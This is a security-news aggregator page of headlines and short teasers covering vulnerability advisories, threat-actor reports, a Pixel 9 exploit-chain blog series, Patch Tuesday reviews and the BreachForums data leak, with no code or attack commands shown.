VU#472136: Information Leak and DoS Vulnerabilities in Redmi Buds 3 Pro through 6 Pro
Overview Redmi Buds, a series of Bluetooth earbuds produced and sold by Xiaomi, contain an Information Leak vulnerability and a Denial of Service (DoS) vulnerability in versions 3 Pro through 6 Pro. An attacker within Bluetooth radio range can send specially crafted RFCOMM protocol interactions...
Read Full Article →
Closing the Door on Net-NTLMv1: Releasing Rainbow Tables to Accelerate Protocol Deprecation
Written by: Nic Losby Introduction Mandiant is publicly releasing a comprehensive dataset of Net-NTLMv1 rainbow tables to underscore the urgency of migrating away from this outdated protocol. Despite Net-NTLMv1 being deprecated and known to be insecure for over two decades—with cryptanalysis dati...
Read Full Article →
UAT-8837 targets critical infrastructure sectors in North America
Cisco Talos is closely tracking UAT-8837, a threat actor we assess with medium confidence is a China-nexus advanced persistent threat (APT) actor.
Read Full Article →
CVE-2025-64155: Exploit Code Released for Critical Fortinet FortiSIEM Command Injection Vulnerability
Exploit code has been published for CVE-2025-64155, a critical command injection vulnerability affecting Fortinet FortiSIEM devices. Key takeaways: CVE-2025-64155 is a critical operating system (OS) command injection vulnerability affecting Fortinet FortiSIEM. Fortinet vulnerabilities have histor...
Read Full Article →
Brushstrokes and breaches with Terryn Valikodath
Terryn’s path to cybersecurity started with a fascination for criminal forensics and a knack for jailbreaking his family's tech — interests that eventually steered him toward the fast-paced world of digital investigations.
Read Full Article →
- German Manufacturing Under Phishing Attacks: Tracking a Stealthy AsyncRAT Campaign — Manufacturing companies have quietly become one of the most hunted species in the modern threat landscape. Not because they are careless, but because they are operationally critical, geographically distributed, and often rely on complex IT and OT environments that attackers love to probe. Key Tak…
A 0-click exploit chain for the Pixel 9 Part 3: Where do we go from here?
▼
While our previous two blog posts provided technical recommendations for increasing the effort required by attackers to develop 0-click exploit chains, our experience finding, reporting and exploiting these vulnerabilities highlighted some broader issues in the Android ecosystem. This post descri...
A 0-click exploit chain for the Pixel 9 Part 2: Cracking the Sandbox with a Big Wave
With the advent of a potential Dolby Unified Decoder RCE exploit, it seemed prudent to see what kind of Linux kernel drivers might be accessible from the resulting userland context, the mediacodec context. As per the AOSP documentation, the mediacodec SELinux context is intended to be a constrain...
A 0-click exploit chain for the Pixel 9 Part 1: Decoding Dolby
Over the past few years, several AI-powered features have been added to mobile phones that allow users to better search and understand their messages. One effect of this change is increased 0-click attack surface, as efficient analysis often requires message media to be decoded before the message...
Microsoft and Adobe Patch Tuesday, January 2026 Security Update Review
Starting the year on a security-first note, Microsoft’s January 2026 Patch Tuesday resolves several vulnerabilities that could impact enterprise environments. Here’s a quick breakdown of what you need to know. Microsoft Patch Tuesday for January 2026: this month’s release addresses 115 vulnerabili...
Microsoft Patch Tuesday for January 2026 — Snort rules and prominent vulnerabilities
Microsoft has released its monthly security update for January 2026, which includes 112 vulnerabilities affecting a range of products, including 8 that Microsoft marked as “critical”.
The AI Fix #83: ChatGPT Health, Victorian LLMs, and the biggest AI bluffers
In episode 83 of The AI Fix, Graham reveals he's taken up lying to LLMs, and shows how a journalist exposed AI bluffers with a made-up idiom. Meanwhile Mark invents a "Godwin's Law" for AI, and explains how to ruin any LLM with humus. Also in this episode, a marriage is declared invalid thanks to...
Hackers get hacked, as BreachForums database is leaked
Have you ever stolen data, traded a hacking tool, or just lurked on a dark web forum believing that you are anonymous? If so, I might have some unsettling news for you. Read more in my article on the Hot for Security blog.
Best Ransomware Detection Tools
Stop ransomware before encryption begins. Learn how intelligence-driven detection tools can help identify precursor behaviors and reduce false positives for faster response.
December 2025 CVE Landscape: 22 Critical Vulnerabilities Mark 120% Surge, React2Shell Dominates Threat Activity
December 2025 saw a 120% surge in critical CVEs, with 22 exploited flaws and React2Shell (CVE-2025-55182) dominating threat activity across Meta’s React framework.
BreachForums (2025) - 672,247 breached accounts
In October 2025, a reincarnation of the hacking forum BreachForums, which had previously been shut down multiple times, was taken offline by a coalition of law enforcement agencies. In the months leading up to the takedown, the site itself suffered a data breach that exposed a total of 672k uniq...